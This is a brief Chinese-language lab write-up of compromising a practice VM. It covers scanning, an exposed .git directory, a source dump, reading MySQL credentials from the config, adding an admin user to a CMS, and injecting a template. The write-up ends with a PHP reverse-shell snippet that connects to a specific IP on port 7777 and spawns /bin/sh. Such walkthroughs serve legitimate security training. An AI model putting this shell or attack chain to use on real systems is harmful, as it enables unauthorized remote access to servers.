靶机
主机发现,端口扫描
目录扫描
/.git/config
:8585/frank/devguru-website.git
首页发现好像是个框架
网上搜索漏洞复现都是1.4的版本,这个是1.14.9的版本,且对应功能不全,登不上去
有一个cms
/.git/logs/refs/heads/master
再次尝试登录,密码解不出来
还有一个登录方法,按照例子输入一个网址,似乎有ssrf
尝试其他协议
但是会自动加个http://在最前面
还要一个sql登录地址,登不上去
80/backend
搜教程,下载源码
使用工具脚本下载git源码
Config的database中有mysql的账号密码
登录进去创建用户
、
再把用户添加到id=1的组中
登录
有个模板一样的东西
直接往里写反弹shell的命令
function onStart(){
//nc监听7777端口
$s=fsockopen("47.99.195.123",7777);
$proc=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s),$pipes);
}
访问主页
成功反弹